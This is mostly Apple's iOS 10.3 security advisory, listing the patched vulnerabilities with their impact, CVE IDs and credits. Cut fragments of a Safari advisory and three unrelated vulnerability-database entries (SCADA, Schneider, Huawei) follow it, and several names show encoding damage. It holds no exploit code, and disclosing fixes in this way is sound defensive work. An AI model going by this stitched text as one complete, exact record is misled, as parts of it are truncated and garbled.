Impact: Configuring an Exchange account with a mistyped email address
may resolve to an unexpected server
Description: An input validation issue existed in the handling of
Exchange email addresses. This issue was addressed through improved
input validation.
CVE-2017-2414: Ilya Nesterov and Maxim Goncharov
FontParser
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing a maliciously crafted font file may lead to
arbitrary code execution
Description: Multiple memory corruption issues were addressed through
improved input validation.
CVE-2017-2406: riusksk (ae3aY=) of Tencent Security Platform
Department
CVE-2017-2487: riusksk (ae3aY=) of Tencent Security Platform
Department
FontParser
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Parsing a maliciously crafted font file may lead to an
unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues were addressed through
improved input validation.
CVE-2017-2407: riusksk (ae3aY=) of Tencent Security Platform
Department
FontParser
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing a maliciously crafted font may result in the
disclosure of process memory
Description: An out-of-bounds read was addressed through improved
input validation.
CVE-2017-2439: John Villamil, Doyensec
HomeKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Home Control may unexpectedly appear on Control Center
Description: A state issue existed in the handling of Home Control.
This issue was addressed through improved validation.
CVE-2017-2434: Suyash Narain of India
HTTPProtocol
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: A malicious HTTP/2 server may be able to cause undefined
behavior
Description: Multiple issues existed in nghttp2 before 1.17.0. These
were addressed by updating LibreSSL to version 1.17.0.
CVE-2017-2428
ImageIO
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing a maliciously crafted image may lead to arbitrary
code execution
Description: A memory corruption issue was addressed through improved
input validation.
CVE-2017-2416: Qidan He (a1/2ae*a,1, @flanker_hqd) of KeenLab, Tencent
ImageIO
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Viewing a maliciously crafted JPEG file may lead to arbitrary
code execution
Description: A memory corruption issue was addressed through improved
input validation.
CVE-2017-2432: an anonymous researcher working with Trend Micro's
Zero Day Initiative
ImageIO
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing a maliciously crafted file may lead to an
unexpected application termination or arbitrary code execution
Description: A memory corruption issue was addressed through improved
input validation.
CVE-2017-2467
ImageIO
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing a maliciously crafted image may lead to unexpected
application termination
Description: An out-of-bound read existed in LibTIFF versions before
4.0.7. This was addressed by updating LibTIFF in ImageIO to version
4.0.7.
CVE-2016-3619
iTunes Store
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: An attacker in a privileged network position may be able to
tamper with iTunes network traffic
Description: Requests to iTunes sandbox web services were sent in
cleartext. This was addressed by enabling HTTPS.
CVE-2017-2412: Richard Shupak (linkedin.com/in/rshupak)
Kernel
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed through improved
input validation.
CVE-2017-2398: Lufeng Li of Qihoo 360 Vulcan Team
CVE-2017-2401: Lufeng Li of Qihoo 360 Vulcan Team
Kernel
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: An integer overflow was addressed through improved input
validation.
CVE-2017-2440: an anonymous researcher
Kernel
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: A malicious application may be able to execute arbitrary code
with root privileges
Description: A race condition was addressed through improved memory
handling.
CVE-2017-2456: lokihardt of Google Project Zero
Kernel
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A use after free issue was addressed through improved
memory management.
CVE-2017-2472: Ian Beer of Google Project Zero
Kernel
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: A malicious application may be able to execute arbitrary code
with kernel privileges
Description: A memory corruption issue was addressed through improved
input validation.
CVE-2017-2473: Ian Beer of Google Project Zero
Kernel
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: An off-by-one issue was addressed through improved
bounds checking.
CVE-2017-2474: Ian Beer of Google Project Zero
Kernel
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A race condition was addressed through improved locking.
CVE-2017-2478: Ian Beer of Google Project Zero
Kernel
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A buffer overflow issue was addressed through improved
memory handling.
CVE-2017-2482: Ian Beer of Google Project Zero
CVE-2017-2483: Ian Beer of Google Project Zero
Keyboards
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: An application may be able to execute arbitrary code
Description: A buffer overflow was addressed through improved bounds
checking.
CVE-2017-2458: Shashank (@cyberboyIndia)
libarchive
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: A local attacker may be able to change file system
permissions on arbitrary directories
Description: A validation issue existed in the handling of symlinks.
This issue was addressed through improved validation of symlinks.
CVE-2017-2390: Omer Medan of enSilo Ltd
libc++abi
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Demangling a malicious C++ application may lead to arbitrary
code execution
Description: A use after free issue was addressed through improved
memory management.
CVE-2017-2441
Pasteboard
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: A person with physical access to an iOS device may read the
pasteboard
Description: The pasteboard was encrypted with a key protected only
by the hardware UID. This issue was addressed by encrypting the
pasteboard with a key protected by the hardware UID and the user's
passcode.
CVE-2017-2399
Phone
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: A third party app can initiate a phone call without user
interaction
Description: An issue existed in iOS allowing for calls without
prompting. This issue was addressed by prompting a user to confirm
call initiation.
CVE-2017-2484
Profiles
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: An attacker may be able to exploit weaknesses in the DES
cryptographic algorithm
Description: Support for the 3DES cryptographic algorithm was added
to the SCEP client and DES was deprecated.
CVE-2017-2380: an anonymous researcher
Quick Look
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Tapping a tel link in a PDF document could trigger a call
without prompting the user
Description: An issue existed when checking the tel URL before
initiating calls. This issue was addressed with the addition of a
confirmation prompt.
CVE-2017-2404: Tuan Anh Ngo (Melbourne, Australia), Christoph Nehring
Safari
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Visiting a malicious website may lead to address bar spoofing
Description: A state management issue was addressed by disabling text
input until the destination page loads.
CVE-2017-2376: Chris Hlady of Google Inc, Muneaki Nishimura
(nishimunea) of Recruit Technologies Co., Ltd., Yuyang Zhou of
Tencent Security Platform Department (security.tencent.com), Michal
Zalewski of Google Inc, an anonymous researcher, an anonymous
researcher
Safari
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: A local user may be able to discover websites a user has
visited in Private Browsing
Description: An issue existed in SQLite deletion. This issue was
addressed through improved SQLite cleanup.
CVE-2017-2384
Safari
Available for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6,
and macOS Sierra 10.12.4
Impact: Processing maliciously crafted web content may present
authentication sheets over arbitrary web sites
Description: A spoofing issue existed in the handling of HTTP
authentication. This issue was addressed through making HTTP
authentication sheets non-modal.
CVE-2017-2389: ShenYeYinJiu of Tencent Security Response Center, TSRC
Safari
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Visiting a malicious website by clicking a link may lead to
user interface spoofing
Description: A spoofing issue existed in the handling of FaceTime
prompts. This issue was addressed through improved input validation.
CVE-2017-2453: xisigr of Tencent's Xuanwu Lab (tencent.com)
Safari Reader
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Enabling the Safari Reader feature on a maliciously crafted
webpage may lead to universal cross site scripting
Description: Multiple validation issues were addressed through
improved input sanitization.
CVE-2017-2393: Erling Ellingsen
SafariViewController
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Cache state is not properly kept in sync between Safari and
SafariViewController when a user clears Safari cache
Description: An issue existed in clearing Safari cache information
from SafariViewController. This issue was addressed by improving
cache state handling.
CVE-2017-2400: Abhinav Bansal of Zscaler, Inc.
Security
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Validating empty signatures with SecKeyRawVerify() may
unexpectedly succeed
Description: An validation issue existed with cryptographic API
calls. This issue was addressed through improved parameter
validation.
CVE-2017-2423: an anonymous researcher
Security
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: An attacker with a privileged network position may capture or
modify data in sessions protected by SSL/TLS
Description: Under certain circumstances, Secure Transport failed to
validate the authenticity of OTR packets. This issue was addressed by
restoring missing validation steps.
CVE-2017-2448: Alex Radocea of Longterm Security, Inc.
Security
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: An application may be able to execute arbitrary code with
root privileges
Description: A buffer overflow was addressed through improved bounds
checking.
CVE-2017-2451: Alex Radocea of Longterm Security, Inc.
Security
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing a maliciously crafted x509 certificate may lead to
arbitrary code execution
Description: A memory corruption issue existed in the parsing of
certificates. This issue was addressed through improved input
validation.
CVE-2017-2485: Aleksandar Nikolic of Cisco Talos
Siri
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Siri might reveal text message contents while the device is
locked
Description: An insufficient locking issue was addressed with
improved state management.
CVE-2017-2452: Hunter Byrnes
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Dragging and dropping a maliciously crafted link may lead to
bookmark spoofing or arbitrary code execution
Description: A validation issue existed in bookmark creation. This
issue was addressed through improved input validation.
CVE-2017-2378: xisigr of Tencent's Xuanwu Lab (tencent.com)
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Visiting a malicious website may lead to address bar spoofing
Description: An inconsistent user interface issue was addressed
through improved state management.
CVE-2017-2486: redrain of light4freedom
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin
Description: A prototype access issue was addressed through improved
exception handling.
CVE-2017-2386: AndrA(c) Bargull
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: Multiple memory corruption issues were addressed through
improved input validation.
CVE-2016-9642: Gustavo Grieco
CVE-2017-2394: Apple
CVE-2017-2396: Apple
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: Multiple memory corruption issues were addressed through
improved memory handling.
CVE-2017-2395: Apple
CVE-2017-2454: Ivan Fratric of Google Project Zero
CVE-2017-2455: Ivan Fratric of Google Project Zero
CVE-2017-2457: lokihardt of Google Project Zero
CVE-2017-2459: Ivan Fratric of Google Project Zero
CVE-2017-2460: Ivan Fratric of Google Project Zero
CVE-2017-2464: Natalie Silvanovich of Google Project Zero, Jeonghoon
Shin
CVE-2017-2465: Zheng Huang and Wei Yuan of Baidu Security Lab
CVE-2017-2466: Ivan Fratric of Google Project Zero
CVE-2017-2468: lokihardt of Google Project Zero
CVE-2017-2469: lokihardt of Google Project Zero
CVE-2017-2470: lokihardt of Google Project Zero
CVE-2017-2476: Ivan Fratric of Google Project Zero
CVE-2017-2481: 0011 working with Trend Micro's Zero Day Initiative
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A type confusion issue was addressed through improved
memory handling.
CVE-2017-2415: Kai Kang of Tencent's Xuanwu Lab (tentcent.com)
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may lead to
unexpectedly unenforced Content Security Policy
Description: An access issue existed in Content Security Policy. This
issue was addressed through improved access restrictions.
CVE-2017-2419: Nicolai GrA,dum of Cisco Systems
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may lead to high
memory consumption
Description: An uncontrolled resource consumption issue was addressed
through improved regex processing.
CVE-2016-9643: Gustavo Grieco
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may result in the
disclosure of process memory
Description: An information disclosure issue existed in the
processing of OpenGL shaders. This issue was addressed through
improved memory management.
CVE-2017-2424: Paul Thomson (using the GLFuzz tool) of the Multicore
Programming Group, Imperial College London
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A memory corruption issue was addressed through improved
input validation.
CVE-2017-2433: Apple
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin
Description: Multiple validation issues existed in the handling of
page loading. This issue was addressed through improved logic.
CVE-2017-2364: lokihardt of Google Project Zero
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: A malicious website may exfiltrate data cross-origin
Description: A validation issue existed in the handling of page
loading. This issue was addressed through improved logic.
CVE-2017-2367: lokihardt of Google Project Zero
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may lead to
universal cross site scripting
Description: A logic issue existed in the handling of frame objects.
This issue was addressed with improved state management.
CVE-2017-2445: lokihardt of Google Project Zero
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A logic issue existed in the handling of strict mode
functions. This issue was addressed with improved state management.
CVE-2017-2446: Natalie Silvanovich of Google Project Zero
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Visiting a maliciously crafted website may compromise user
information
Description: A memory corruption issue was addressed through improved
memory handling.
CVE-2017-2447: Natalie Silvanovich of Google Project Zero
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A use after free issue was addressed through improved
memory management.
CVE-2017-2471: Ivan Fratric of Google Project Zero
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may lead to
universal cross site scripting
Description: A logic issue existed in frame handling. This issue was
addressed through improved state management.
CVE-2017-2475: lokihardt of Google Project Zero
WebKit JavaScript Bindings
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin
Description: Multiple validation issues existed in the handling of
page loading. This issue was addressed through improved logic.
CVE-2017-2442: lokihardt of Google Project Zero
WebKit Web Inspector
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Closing a window while paused in the debugger may lead to
unexpected application termination
Description: A memory corruption issue was addressed through improved
input validation.
CVE-2017-2377: Vicki Pfau
WebKit Web Inspector
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A memory corruption issue was addressed through improved
input validation.
CVE-2017-2405: Apple
Installation note:
This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from www.apple.com/itunes/
iTunes and Software Update on the device will automatically check
Apple's update server on its weekly schedule. When an update is
detected, it is downloaded and the option to be installed is
presented to the user when the iOS device is docked. We recommend
applying the update immediately if possible. Selecting Don't Install
will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the
day that iTunes or the device checks for updates. You may manually
obtain the update via the Check for Updates button within iTunes, or
the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About. The version after applying this update
will be "10.3".
Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Comment: GPGTools - http://gpgtools.org
iQIcBAEBCgAGBQJY2Yo7AAoJEIOj74w0bLRGjD0QAM4YYtIfzBZVDPI5bdJn/hJN
TcT2V+jb//DwbCFRReuECFt5IZ0Exh8bQJZmpuCi70EAGdo1LXj6CbML28UiPHzp
Fp7BQH6bnThlhJZ2QM8qR0a7AFSIBGQ3g1vo+l2RHv8fgn/Rt6kdNFrdiIJYe/zy
rMrl6wRooRFwcew4aMJjeg38DucG8Qe2HvyiTyNvk+xohy1XDMGxRGavHRAx2xlU
kIqNnVJaB62prp5bAVFHMCbmAu9trx9z5ccgcJpgxfkuxDm+ff2uicw9kBsVtEpv
HxJ4sByRIfqof0W+OZJdjcDYJ0agzay/voItd2r/7e9bzalYt50etvqD6GcmX46g
ch57cYEOeZb1geYyds/vwIw+xT/nbMReiih3/rM9igcaN4Z3QtdqAQlgdzbAbfdq
IPfGrdiHFTL+n4OCSr7Vh3lc9YtJWOV/m5xtlAH1y1TnNoymEG/u91/cPJoxHjD3
DKlbJGhaKMsLk2n/6YAsHicYR07MmMSugAt141ICO49MoMg9V97RjWmhBtNKU6p8
7tOhaNvhaeRajm1JyYqksrm4fAhjE86FxH84A7wSzR/kUpIsAap3kGFNCw7MdGo7
31qbIQ8SGsXHUSE/dlYsgCRkVUibatDv4KKXCd5s1BOAV/laj56p/vvs4mqjefZF
VIn0q35Nvzk3j3yBB2fI
=jsYt
-----END PGP SIGNATURE-----
.
CVE-2017-2405: Apple
Installation note:
Safari 10.1 may be obtained from the Mac App Store.
CVE-2017-2351: Sriram (@Sri_Hxor) of Primefort Pvt. Ltd., Hemanth
Joseph
Additional recognition
WebKit hardening
We would like to acknowledge Ben Gras, Kaveh Razavi, Erik Bosman,
Herbert Bos, and Cristiano Giuffrida of the vusec group at
Vrije Universiteit Amsterdam for their assistance
| VAR-201701-1142 | No CVE | Scada-os Configuration Software dll Hijacking vulnerability |
CVSS V2: 6.3 CVSS V3: - Severity: MEDIUM |
Scada-os is a SCADA system developed by multiple SCADA configuration software engineers.
The TsStudio.exe component of the Scada-os configuration software unsafely loads the library file. An attacker can construct a malicious application and place it in a specific path, which can cause the application to maliciously load a DLL and execute it. DLL And execute
| VAR-201704-1294 | CVE-2017-8371 | Schneider Electric StruxureWare Data Center Expert Vulnerability in which important information is obtained |
CVSS V2: 4.0 CVSS V3: 6.8 Severity: MEDIUM |
Schneider Electric StruxureWare Data Center Expert before 7.4.0 uses cleartext RAM storage for passwords, which might allow remote attackers to obtain sensitive information via unspecified vectors. Schneider Electric StruxureWare Data Center is a data center automation system of Schneider Electric (France).
Successfully exploiting this issue may allow an attacker to obtain sensitive information that may aid in further attacks
| VAR-201711-0227 | CVE-2017-2711 | P9 Plus Vulnerability related to input validation in smartphone software |
CVSS V2: 7.1 CVSS V3: 5.5 Severity: MEDIUM |
P9 Plus smartphones with software earlier than VIE-AL10C00B352 versions have an input validation vulnerability in the touchscreen Driver. An attacker can tricks a user into installing a malicious application on the smart phone, and send given parameter to smart phone to crash the system. HuaweiP9Plus is a Huawei smartphone product from China. An input verification security vulnerability exists in the touch screen driver of the HuaweiP9Plus mobile phone. Huawei P9 Plus is prone to a local denial-of-service vulnerability.
A local attacker can exploit this issue to cause a denial-of-service condition